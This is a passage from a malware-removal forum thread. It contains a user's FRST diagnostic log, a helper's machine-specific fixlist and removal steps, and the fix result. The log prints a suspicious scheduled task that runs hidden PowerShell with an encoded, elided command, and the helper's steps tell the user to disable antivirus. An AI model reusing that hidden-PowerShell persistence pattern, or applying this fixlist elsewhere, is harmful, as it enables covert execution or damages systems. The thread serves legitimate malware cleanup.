Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
MSXML 4.0 SP2 Parser and SDK (HKLM-x32\...\{716E0306-8318-4364-8B8F-0CC4E9376BAC}) (Version: 4.20.9818.0 - Microsoft Corporation)
MyEpson Portal (HKLM-x32\...\MyEpson Portal) (Version:  - SEIKO EPSON Corporation)
MyEpson Portal (x32 Version: 1.1.1.0 - SEIKO EPSON CORPORATION) Hidden
Office 16 Click-to-Run Extensibility Component (Version: 16.0.6326.1022 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Licensing Component (Version: 16.0.6326.1022 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Localization Component (Version: 16.0.6326.1022 - Microsoft Corporation) Hidden
Olympus Sonority (HKLM-x32\...\{40CAF5AE-4E70-46C8-8AD8-4A036D32525C}) (Version: 1.4.4 - OLYMPUS IMAGING CORP.)
QuickTime 7 (HKLM-x32\...\{111EE7DF-FC45-40C7-98A7-753AC46B12FB}) (Version: 7.75.80.95 - Apple Inc.)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7414 - Realtek Semiconductor Corp.)
Revo Uninstaller 1.95 (HKLM-x32\...\Revo Uninstaller) (Version: 1.95 - VS Revo Group)
Save to Video (HKLM-x32\...\{CA2A6D7F-514E-40FF-ABE4-289E606BC553}) (Version: 1.10.5 - Claro Software)
ScreenRuler (HKLM-x32\...\{F0D0C21A-1C82-4345-A8BE-EC28A9CA813E}) (Version: 3.2.10 - Claro Software)
Skype™ 7.3 (HKLM-x32\...\{24991BA0-F0EE-44AD-9CC8-5EC50AECF6B7}) (Version: 7.3.101 - Skype Technologies S.A.)
Software Updater (HKLM-x32\...\{8DBC5A0A-31C4-46C7-B252-6B593EA11A87}) (Version: 4.3.7 - SEIKO EPSON CORPORATION)
Sonocent Audio Notetaker 4.1 (HKLM-x32\...\{2B2BF01C-0EB8-446B-80AB-AA0ADA01A9D1}) (Version: 4.1.5027.0 - Sonocent Ltd.)
Spellex Dictation Gold Medical (HKLM-x32\...\{E1742941-2980-448E-BA63-800664BFC8AA}) (Version: 1.27.2015 - Spellex)
Synaptics Pointing Device Driver (HKLM\...\SynTPDeinstKey) (Version: 18.1.7.6 - Synaptics Incorporated)
The Desktop Weather 2.0 (HKLM\...\WeatherTool) (Version: 2.0.0.10998 - ShenZhen Enode Techology co,.Ltd) <==== ATTENTION
Validity WBF DDK (HKLM\...\{DB87BB79-2BDF-424E-A534-6F29C402AF46}) (Version: 4.5.246.0 - Validity Sensors, Inc.)
VLC media player (HKLM\...\VLC media player) (Version: 2.2.1 - VideoLAN)
Vocalizer Daniel from Claro Software (HKLM-x32\...\{36FB67D5-2099-41E0-8E28-7E061828845C}) (Version: 1.2.1.0 - Claro Software)
Vocalizer Fiona from Claro Software (HKLM-x32\...\{AE789798-995E-47D0-A16C-55E97BCDBFC8}) (Version: 1.2.1.0 - Claro Software)
Vocalizer Karen from Claro Software (HKLM-x32\...\{BFF55ECD-AA48-4872-82A5-65BFD3598CB8}) (Version: 1.2.1.0 - Claro Software)
Vocalizer Lee from Claro Software (HKLM-x32\...\{8B0DF0EC-FCC1-4A97-86E4-E0D9720DAA92}) (Version: 1.2.1.0 - Claro Software)
Vocalizer Moira from Claro Software (HKLM-x32\...\{B8C81D28-7194-4F07-94BE-733615F498E9}) (Version: 1.2.1.0 - Claro Software)
Vocalizer Sangeeta from Claro Software (HKLM-x32\...\{3C7D16C3-F67E-467B-9200-B02C020C5A78}) (Version: 1.2.1.0 - Claro Software)
Vocalizer Serena from Claro Software (HKLM-x32\...\{4345FA12-BFC9-492B-B47C-C7BEF6785398}) (Version: 1.2.1.0 - Claro Software)
Vocalizer Tom from Claro Software (HKLM-x32\...\{985F3407-E764-4D79-B1AB-ECA53FFBEC52}) (Version: 1.2.1.0 - Claro Software)
 
==================== Custom CLSID (Whitelisted): ==========================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
 
==================== Scheduled Tasks (Whitelisted) =============
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
Task: {1FA5BAC6-912E-4071-8FF0-612A0375EEB8} - System32\Tasks\{087E0D47-040C-780F-0511-0B09797E117A} => powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand [encoded command elided]
Task: {338E3F22-6BBD-44BA-9FF9-2AD947C3E864} - System32\Tasks\Microsoft\Office\Office ClickToRun Service Monitor => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [2016-01-17] (Microsoft Corporation)
Task: {39F405B1-A5DD-4095-A83F-4F7E36C70E90} - System32\Tasks\Microsoft\Windows\Setup\GWXTriggers\ScheduleUpgradeTime => C:\Windows\system32\GWX\GWXUXWorker.exe [2015-12-05] (Microsoft Corporation)
Task: {48732612-692B-4ED3-B466-B9D75B2262DA} - System32\Tasks\LaunchPreSignup => C:\Program Files (x86)\OLBPre\OLBPre.exe <==== ATTENTION
Task: {596FDB6E-A01F-45C2-8D19-3E109687F226} - System32\Tasks\EPSON XP-322 323 325 Series Update {3F135F97-7E6C-46D6-BBA8-E64BB4DD38C1} => C:\Windows\system32\spool\DRIVERS\x64\3\E_YTSNEE.EXE [2013-11-22] (SEIKO EPSON CORPORATION)
Task: {710FFFC7-4734-4D8B-856B-189E4BBD7E41} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-10-07] (Google Inc.)
Task: {7F209075-152E-4942-AC1C-445F76407004} - System32\Tasks\Microsoft\Windows\Setup\GWXTriggers\ScheduleUpgradeReminderTime => C:\Windows\system32\GWX\GWXUXWorker.exe [2015-12-05] (Microsoft Corporation)
Task: {8FA80B74-5C5A-40F7-BC95-8178BAC3B04C} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Solutions Framework Updater – Install HPSA => C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\Modules\HPSSFUpdater.exe [2016-01-06] (Hewlett-Packard)
Task: {995EBB86-0968-4E1D-AEE9-CFF6BA6ADBB1} - System32\Tasks\Microsoft\Office\Office Automatic Updates => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [2016-01-17] (Microsoft Corporation)
Task: {A1340996-9DFD-4643-9DB9-CD6557F04C78} - System32\Tasks\Microsoft\Windows\RemovalTools\MRT_HB => C:\Windows\system32\MRT.exe [2016-01-13] (Microsoft Corporation)
Task: {B73AB507-80A1-4CCC-AFBC-5BEA965C19F8} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2015-12-13] (Adobe Systems Incorporated)
Task: {B7E87F06-7BDB-44FA-BA49-F0A0E2720DDD} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe [2015-08-27] (Apple Inc.)
Task: {BCDE7591-5275-4FC5-8E20-0C2C5EEF8724} - System32\Tasks\Microsoft OneDrive Auto Update Task-S-1-5-21-1343854479-873069186-2863876452-1002 => C:\Users\Molly Poole\AppData\Local\Microsoft\OneDrive\OneDrive.exe [2016-02-05] (Microsoft Corporation)
Task: {EDFD5295-3F44-4410-8F1F-8CFADB927E39} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Solutions Framework Report => C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\Modules\HPSFReport.exe [2016-01-12] (Hewlett-Packard Company)
Task: {F23E56AC-D047-4CB6-9B31-6C68F4F5628F} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-10-07] (Google Inc.)
Task: {F294D4E7-6102-488D-996D-3EEA4F9452AC} - System32\Tasks\EPSON XP-322 323 325 Series Update {178A5127-B7E2-4709-B44E-4F2F52BA4C65} => C:\Windows\system32\spool\DRIVERS\x64\3\E_YTSNEE.EXE [2013-11-22] (SEIKO EPSON CORPORATION)
Task: {F4EBE581-F5BC-45BD-AB1B-C2E2E6E46779} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Solutions Framework Updater => C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\Modules\HPSSFUpdater.exe [2016-01-06] (Hewlett-Packard)
 
(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)
 
Task: C:\Windows\Tasks\EPSON XP-322 323 325 Series Update {178A5127-B7E2-4709-B44E-4F2F52BA4C65}.job => C:\Windows\system32\spool\DRIVERS\x64\3\E_YTSNEE.EXE:/EXE:{178A5127-B7E2-4709-B44E-4F2F52BA4C65} /F:UpdateWORKGROUP\POOLE-PC$ĊSearches for EPSON software updates, and notifies you when updates are available.If this task is disabled or stopped, your EPSON software will not be automatically kept up to date.Thi
Task: C:\Windows\Tasks\EPSON XP-322 323 325 Series Update {3F135F97-7E6C-46D6-BBA8-E64BB4DD38C1}.job => C:\Windows\system32\spool\DRIVERS\x64\3\E_YTSNEE.EXE:/EXE:{3F135F97-7E6C-46D6-BBA8-E64BB4DD38C1} /F:UpdateWORKGROUP\POOLE-PC$ĊSearches for EPSON software updates, and notifies you when updates are available.If this task is disabled or stopped, your EPSON software will not be automatically kept up to date.Thi
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
 
==================== Shortcuts =============================
 
(The entries could be listed to be restored or removed.)
 
==================== Loaded Modules (Whitelisted) ==============
 
2015-11-20 14:57 - 2015-11-20 14:57 - 00085800 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\zlib1.dll
2015-11-20 14:57 - 2015-11-20 14:57 - 01328912 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\libxml2.dll
2015-12-08 10:30 - 2016-01-17 14:46 - 00171712 _____ () C:\Program Files\Common Files\Microsoft Shared\ClickToRun\ApiClient.dll
2015-11-02 01:48 - 2015-11-02 01:48 - 00152008 _____ () C:\Program Files (x86)\WeatherTool\2.0.0.10998\WeatherService.exe
2015-11-02 01:48 - 2015-11-02 01:48 - 01049032 _____ () C:\Program Files (x86)\WeatherTool\2.0.0.10998\WeatherEntryDll.dll
2015-10-07 11:22 - 2014-10-17 00:14 - 00456808 _____ () C:\Windows\system32\igfxTray.exe
2015-02-12 15:18 - 2015-02-12 15:18 - 00053760 _____ () C:\Program Files (x86)\Spellex\Spellex Dictation\spxsr.exe
2015-02-12 15:18 - 2015-02-12 15:18 - 00009216 _____ () C:\Program Files (x86)\Spellex\Spellex Dictation\Shared.dll
2016-01-28 20:43 - 2016-01-17 22:01 - 08913088 _____ () C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\1033\GrooveIntlResource.dll
2016-02-05 13:33 - 2016-02-03 07:27 - 01632584 _____ () C:\Program Files (x86)\Google\Chrome\Application\48.0.2564.103\libglesv2.dll
2016-02-05 13:33 - 2016-02-03 07:27 - 00087880 _____ () C:\Program Files (x86)\Google\Chrome\Application\48.0.2564.103\libegl.dll
 
==================== Alternate Data Streams (Whitelisted) =========
 
(If an entry is included in the fixlist, only the ADS will be removed.)
 
AlternateDataStreams: C:\ProgramData\TEMP:0FF263E8
 
==================== Safe Mode (Whitelisted) ===================
 
(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)
 
 
==================== EXE Association (Whitelisted) ===============
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed.)
 
 
==================== Internet Explorer trusted/restricted ===============
 
(If an entry is included in the fixlist, it will be removed from the registry.)
 
 
==================== Hosts content: ===============================
 
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
 
2013-08-22 13:25 - 2013-08-22 13:25 - 00000824 ____A C:\Windows\system32\Drivers\etc\hosts
 
 
==================== Other Areas ============================
 
(Currently there is no automatic fix for this section.)
 
HKU\S-1-5-21-1343854479-873069186-2863876452-1002\Control Panel\Desktop\\Wallpaper -> C:\Users\Molly Poole\AppData\Roaming\Microsoft\Windows Photo Viewer\Windows Photo Viewer Wallpaper.jpg
DNS Servers: 192.168.0.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall is enabled.
 
==================== MSCONFIG/TASK MANAGER disabled items ==
 
(Currently there is no automatic fix for this section.)
 
 
==================== FirewallRules (Whitelisted) ===============
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
FirewallRules: [vm-monitoring-nb-session] => (Allow) LPort=139
FirewallRules: [WCF-NetTcpActivator-In-TCP-64bit] => (Allow) LPort=808
FirewallRules: [{3D78179E-83A9-406A-9533-AC37541AF060}] => (Allow) C:\Program Files\Microsoft Office\root\Office16\outlook.exe
FirewallRules: [{B38D34A1-3620-4593-B215-89540B3CA0F9}] => (Allow) C:\Users\Molly Poole\AppData\Local\Microsoft\OneDrive\OneDrive.exe
FirewallRules: [{C7CC67E7-56A5-42EE-9831-645F3517F02A}] => (Allow) LPort=51001
FirewallRules: [{EC4A8AE3-2238-4B80-B039-0981B7D79B43}] => (Allow) E:\Network\EpsonNetSetup\ENEasyApp.exe
FirewallRules: [{9791B440-C474-4C29-BE63-8A0E970AE25A}] => (Allow) E:\Network\EpsonNetSetup\ENEasyApp.exe
FirewallRules: [{42284AC1-4D1D-4A60-BD42-4791D4AAC464}] => (Allow) C:\Program Files (x86)\Epson Software\Event Manager\EEventManager.exe
FirewallRules: [{52BAC826-4404-4489-AF83-0A119FD4017E}] => (Allow) C:\Program Files (x86)\Epson Software\Event Manager\EEventManager.exe
FirewallRules: [{63E810CA-7576-4D82-BCEC-F71F019AC47E}] => (Allow) C:\Program Files (x86)\EPSON Software\ECPrinterSetup\ENPApp.exe
FirewallRules: [{00088927-2CE4-4262-AE1E-69CD5B868051}] => (Allow) C:\Program Files (x86)\EPSON Software\ECPrinterSetup\ENPApp.exe
FirewallRules: [{5F2466B1-21CC-47B1-B609-17AB2036EEA5}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{72653741-6AD7-496F-9BCB-71529A33FAD9}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{6CBC35A6-BC39-4B14-9718-53457E0828F6}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{0787C03E-8A34-4F71-9D72-B3749C77FD1B}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{004E25E4-4EE1-49D6-B818-2D1785FB3838}] => (Allow) C:\Program Files\iTunes\iTunes.exe
FirewallRules: [{B9F83196-13DF-4D8B-BE8D-0075C1541776}] => (Allow) LPort=51001
FirewallRules: [{A797377B-91CC-40E2-A5E8-1CFE9CA70C28}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
 
==================== Restore Points =========================
 
 
==================== Faulty Device Manager Devices =============
 
 
==================== Event log errors: =========================
 
Application errors:
==================
Error: (02/09/2016 02:29:38 PM) (Source: System Restore) (EventID: 8193) (User: )
Description: Failed to create restore point (Process = D:\Users\Molly Poole\Desktop\Revo Uninstaller\revouninstaller.exe Poole\Desktop\Revo Uninstaller\revouninstaller.exe"; Description = Revo Uninstaller's restore point - One System Care; Error = 0x80070422).
 
Error: (02/09/2016 01:24:38 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: Scan2TextPro.exe, version: 5.1.17.17, time stamp: 0x55a53080
Faulting module name: ntdll.dll, version: 6.3.9600.18185, time stamp: 0x5683eff4
Exception code: 0xc0000005
Fault offset: 0x00040fd2
Faulting process ID: 0x9474
Faulting application start time: 0xScan2TextPro.exe0
Faulting application path: Scan2TextPro.exe1
Faulting module path: Scan2TextPro.exe2
Report ID: Scan2TextPro.exe3
Faulting package full name: Scan2TextPro.exe4
Faulting package-relative application ID: Scan2TextPro.exe5
 
Error: (02/09/2016 11:34:45 AM) (Source: Customer Experience Improvement Program) (EventID: 1008) (User: )
Description: 80070005
 
Error: (02/09/2016 11:01:30 AM) (Source: DNS logging) (EventID: 0) (User: )
Description: Logger: Socket error: 10054
 
Error: (02/09/2016 10:04:37 AM) (Source: DNS logging) (EventID: 0) (User: )
Description: Logger: Socket error: 10054
 
Error: (02/09/2016 10:04:35 AM) (Source: DNS logging) (EventID: 0) (User: )
Description: Logger: Socket error: 10054
 
Error: (02/09/2016 10:04:05 AM) (Source: DNS logging) (EventID: 0) (User: )
Description: Logger: Socket error: 10054
 
Error: (02/08/2016 10:45:01 PM) (Source: DNS logging) (EventID: 0) (User: )
Description: Logger: Socket error: 10054
 
Error: (02/08/2016 09:31:54 PM) (Source: DNS logging) (EventID: 0) (User: )
Description: Logger: Socket error: 10054
 
Error: (02/08/2016 05:37:01 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: Scan2TextPro.exe, version: 5.1.17.17, time stamp: 0x55a53080
Faulting module name: ntdll.dll, version: 6.3.9600.18185, time stamp: 0x5683eff4
Exception code: 0xc0000005
Fault offset: 0x00040fd2
Faulting process ID: 0x5ab8
Faulting application start time: 0xScan2TextPro.exe0
Faulting application path: Scan2TextPro.exe1
Faulting module path: Scan2TextPro.exe2
Report ID: Scan2TextPro.exe3
Faulting package full name: Scan2TextPro.exe4
Faulting package-relative application ID: Scan2TextPro.exe5
 
 
System errors:
=============
Error: (02/09/2016 10:12:44 AM) (Source: Schannel) (EventID: 4120) (User: NT AUTHORITY)
Description: A fatal alert was generated and sent to the remote endpoint. This may result in termination of the connection. The TLS protocol defined fatal error code is 10. The Windows SChannel error state is 10.
 
Error: (02/09/2016 10:12:44 AM) (Source: Schannel) (EventID: 4120) (User: NT AUTHORITY)
Description: A fatal alert was generated and sent to the remote endpoint. This may result in termination of the connection. The TLS protocol defined fatal error code is 10. The Windows SChannel error state is 10.
 
Error: (02/09/2016 10:12:44 AM) (Source: Schannel) (EventID: 4120) (User: NT AUTHORITY)
Description: A fatal alert was generated and sent to the remote endpoint. This may result in termination of the connection. The TLS protocol defined fatal error code is 10. The Windows SChannel error state is 10.
 
Error: (02/09/2016 10:12:44 AM) (Source: Schannel) (EventID: 4120) (User: NT AUTHORITY)
Description: A fatal alert was generated and sent to the remote endpoint. This may result in termination of the connection. The TLS protocol defined fatal error code is 10. The Windows SChannel error state is 10.
 
Error: (02/08/2016 06:43:54 PM) (Source: NetBT) (EventID: 4319) (User: )
Description: A duplicate name has been detected on the TCP network.  The IP address of
the computer that sent the message is in the data. Use nbtstat -n in a
command window to see which name is in the Conflict state.
 
Error: (02/08/2016 06:43:54 PM) (Source: NetBT) (EventID: 4319) (User: )
Description: A duplicate name has been detected on the TCP network.  The IP address of
the computer that sent the message is in the data. Use nbtstat -n in a
command window to see which name is in the Conflict state.
 
Error: (02/08/2016 06:43:54 PM) (Source: NetBT) (EventID: 4319) (User: )
Description: A duplicate name has been detected on the TCP network.  The IP address of
the computer that sent the message is in the data. Use nbtstat -n in a
command window to see which name is in the Conflict state.
 
Error: (02/08/2016 06:43:53 PM) (Source: NetBT) (EventID: 4319) (User: )
Description: A duplicate name has been detected on the TCP network.  The IP address of
the computer that sent the message is in the data. Use nbtstat -n in a
command window to see which name is in the Conflict state.
 
Error: (02/07/2016 10:55:34 PM) (Source: DCOM) (EventID: 10016) (User: POOLE-PC)
Description: application-specificLocalLaunch{7022A3B3-D004-4F52-AF11-E9E987FEE25F}{ADA41B3C-C6FD-4A08-8CC1-D6EFDE67BE7D}Poole-PCMolly PooleS-1-5-21-1343854479-873069186-2863876452-1002LocalHost (Using LRPC)UnavailableUnavailable
 
Error: (02/07/2016 10:55:34 PM) (Source: DCOM) (EventID: 10016) (User: POOLE-PC)
Description: application-specificLocalLaunch{7022A3B3-D004-4F52-AF11-E9E987FEE25F}{ADA41B3C-C6FD-4A08-8CC1-D6EFDE67BE7D}Poole-PCMolly PooleS-1-5-21-1343854479-873069186-2863876452-1002LocalHost (Using LRPC)UnavailableUnavailable
 
 
CodeIntegrity:
===================================
  Date: 2016-02-08 22:57:20.904
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\d3d10_1.dll because the set of per-page image hashes could not be found on the system.
 
  Date: 2016-02-08 22:57:20.842
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\d3d10_1.dll because the set of per-page image hashes could not be found on the system.
 
  Date: 2016-02-08 20:40:03.404
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\d3d10_1.dll because the set of per-page image hashes could not be found on the system.
 
  Date: 2016-02-08 20:40:03.342
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\d3d10_1.dll because the set of per-page image hashes could not be found on the system.
 
  Date: 2016-02-08 20:21:23.757
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\d3d10_1.dll because the set of per-page image hashes could not be found on the system.
 
  Date: 2016-02-08 20:21:23.699
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\d3d10_1.dll because the set of per-page image hashes could not be found on the system.
 
  Date: 2016-02-08 19:27:04.651
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\d3d10_1.dll because the set of per-page image hashes could not be found on the system.
 
  Date: 2016-02-08 19:27:04.593
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\d3d10_1.dll because the set of per-page image hashes could not be found on the system.
 
  Date: 2016-02-08 18:45:05.636
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\d3d10_1.dll because the set of per-page image hashes could not be found on the system.
 
  Date: 2016-02-08 18:45:05.574
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\d3d10_1.dll because the set of per-page image hashes could not be found on the system.
 
 
==================== Memory info =========================== 
 
Processor: Intel® Core™ i5-5200U CPU @ 2.20GHz
Percentage of memory in use: 52%
Total physical RAM: 3995.02 MB
Available physical RAM: 1887.27 MB
Total Virtual: 5059.95 MB
Available Virtual: 2684.77 MB
 
==================== Drives ================================
 
Drive c: (Windows) (Fixed) (Total:194.8 GB) (Free:154.27 GB) NTFS
Drive d: (Data) (Fixed) (Total:235.29 GB) (Free:222.59 GB) NTFS
Drive e: (EPSON) (CDROM) (Total:0.21 GB) (Free:0 GB) CDFS
 
==================== MBR & Partition Table ==================
 
========================================================
Disk: 0 (Size: 465.8 GB) (Disk ID: 843EF19B)
 
Partition: GPT.
 
==================== End of Addition.txt ============================

  • 0

#6
pystryker

    Trusted Helper

  • Malware Removal
  • 3,912 posts

Ok, thanks. I'm pretty sure I have completed all of the above steps. Revo has uninstalled One Systemcare. FRST and Addition log to follow below


You're quite welcome. :) It looks like Revo has done the job, but I do see a couple of other malware related items we need to dispose of. :thumbsup:


Please disable your antivirus for the duration of my instructions. Don't forget to re-enable it after you have completed the steps.


Step 1: Program Uninstall

Please uninstall the following program from your machine as it is adware/malware related.

The Desktop Weather 2.0


Step 2: Fix with FRST
  • Open Notepad (Start => All Programs => Accessories => Notepad). Please copy the entire contents of the code box below. (To do this, highlight the contents of the box, right-click on it and select Copy.)
  • Right-click in the open Notepad and select Paste.
  • Save it on the desktop as fixlist.txt

    NOTE: It's important that both files, FRST/FRST64 and fixlist.txt are in the same location or the fix will not work.

Start
CreateRestorePoint:
CloseProcesses:
() C:\Program Files (x86)\WeatherTool\2.0.0.10998\WeatherService.exe
C:\Program Files (x86)\WeatherTool
(ShenZhen Enode Techology co,.Ltd) C:\Program Files (x86)\WeatherTool\2.0.0.10998\weather.exe
2016-01-22 18:55 - 2016-02-09 11:34 - 00000000 ____D C:\Users\Molly Poole\AppData\Roaming\WeatherTool
2016-01-22 18:55 - 2016-01-22 18:55 - 00000000 ____D C:\Program Files (x86)\WeatherTool
2016-01-22 18:55 - 2016-01-22 18:55 - 00000000 ____D C:\ProgramData\245e70c0-6827-0
2016-01-22 18:55 - 2016-01-22 18:55 - 00000000 ____D C:\ProgramData\245e70c0-3ee5-1
Task: {48732612-692B-4ED3-B466-B9D75B2262DA} - System32\Tasks\LaunchPreSignup => C:\Program Files (x86)\OLBPre\OLBPre.exe <==== ATTENTION
C:\Program Files (x86)\OLBPre
AlternateDataStreams: C:\ProgramData\TEMP:0FF263E8
CMD: bitsadmin /reset /allusers
CMD: netsh advfirewall reset
CMD: netsh advfirewall set allprofiles state on
CMD: ipconfig /flushdns
Emptytemp:
End


NOTICE: This script was written specifically for this user, for use on that particular machine. Running this on another machine may cause damage to your operating system.


Run FRST and press the Fix button just once and wait. The tool will make a log on the desktop (Fixlog.txt) please post it in your next reply.


Step 3: Junkware Removal Tool

Please download Junkware Removal Tool to your desktop.
  • Shut down your protection software now to avoid potential conflicts.
  • Run the tool by double-clicking it. If you are using Windows Vista, 7, or 8; instead of double-clicking, right-mouse click JRT.exe and select "Run as Administrator".
  • The tool will open and start scanning your system.
  • Please be patient as this can take a while to complete depending on your system's specifications.
  • On completion, a log (JRT.txt) is saved to your desktop and will automatically open.
  • Post the contents of JRT.txt into your next message.
Step 4: AdwCleaner

Download ADWcleaner by clicking here. Please save it to your Desktop


  • Double click (Vista and 7 Users) right click the adwcleaner.exe file and click Run as Administrator and accept the UAC prompt to run AdwCleaner
  • Once AdwCleaner's control panel is open and it says "Waiting for Action", click on Options at the top of the control panel.
  • Please Check the following options:
    • Reset Proxy Settings
    • Reset Winsock Settings
    • Reset TCP/IP Settings
    • Reset Firewall Settings
    • Reset IPSec Settings
    • Reset BITS Queue
    • Reset Internet Explorer Policies
    • Reset Chrome Policies
  • Close any open windows or browsers.
  • Pause your Anti-Virus program if it is running.
  • Once it starts, click on the Scan button.
  • Let the scan complete itself. This may take a few minutes.
  • Once the scan has finished, it will say "Pending, uncheck elements you don't want to remove.", don't worry about unchecking anything and then click the Cleaning button. When finished, it will ask to reboot. Please reboot.
  • When the machine has rebooted, a log will be produced. Please copy/paste that in your next reply. Here's how:
    • Click the Logfile button and the log will open. Copy and Paste the contents of the log file into your next reply.
    This report is also saved at C:\
Things I need to see in your next post:

Please post each of these logs as a separate reply in this thread.

Fixlog.txt Log

Junkware Removal Tool Log

AdwCleaner Log

  • 0

#7
moles926

    Member

  • Topic Starter
  • Member
  • PipPip
  • 15 posts
Fix result of Farbar Recovery Scan Tool (x64) Version:07-02-2016
Ran by Molly Poole (2016-02-09 15:32:56) Run:1
Running from D:\Users\Molly Poole\Desktop
Loaded Profiles: Molly Poole (Available Profiles: Molly Poole & Molly)
Boot Mode: Normal
==============================================
 
fixlist content:
*****************
Start
CreateRestorePoint:
CloseProcesses:
() C:\Program Files (x86)\WeatherTool\2.0.0.10998\WeatherService.exe
C:\Program Files (x86)\WeatherTool
(ShenZhen Enode Techology co,.Ltd) C:\Program Files (x86)\WeatherTool\2.0.0.10998\weather.exe
2016-01-22 18:55 - 2016-02-09 11:34 - 00000000 ____D C:\Users\Molly Poole\AppData\Roaming\WeatherTool
2016-01-22 18:55 - 2016-01-22 18:55 - 00000000 ____D C:\Program Files (x86)\WeatherTool
2016-01-22 18:55 - 2016-01-22 18:55 - 00000000 ____D C:\ProgramData\245e70c0-6827-0
2016-01-22 18:55 - 2016-01-22 18:55 - 00000000 ____D C:\ProgramData\245e70c0-3ee5-1
Task: {48732612-692B-4ED3-B466-B9D75B2262DA} - System32\Tasks\LaunchPreSignup => C:\Program Files (x86)\OLBPre\OLBPre.exe <==== ATTENTION
C:\Program Files (x86)\OLBPre
AlternateDataStreams: C:\ProgramData\TEMP:0FF263E8
CMD: bitsadmin /reset /allusers
CMD: netsh advfirewall reset
CMD: netsh advfirewall set allprofiles state on
CMD: ipconfig /flushdns
Emptytemp:
End
*****************
 
Error: (0) Failed to create a restore point.
Processes closed successfully.
C:\Program Files (x86)\WeatherTool\2.0.0.10998\WeatherService.exe => No running process found
"C:\Program Files (x86)\WeatherTool" => not found.
C:\Program Files (x86)\WeatherTool\2.0.0.10998\weather.exe => No running process found
"C:\Users\Molly Poole\AppData\Roaming\WeatherTool" => not found.
"C:\Program Files (x86)\WeatherTool" => not found.
C:\ProgramData\245e70c0-6827-0 => moved successfully
C:\ProgramData\245e70c0-3ee5-1 => moved successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{48732612-692B-4ED3-B466-B9D75B2262DA}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{48732612-692B-4ED3-B466-B9D75B2262DA}" => key removed successfully
C:\Windows\System32\Tasks\LaunchPreSignup => moved successfully
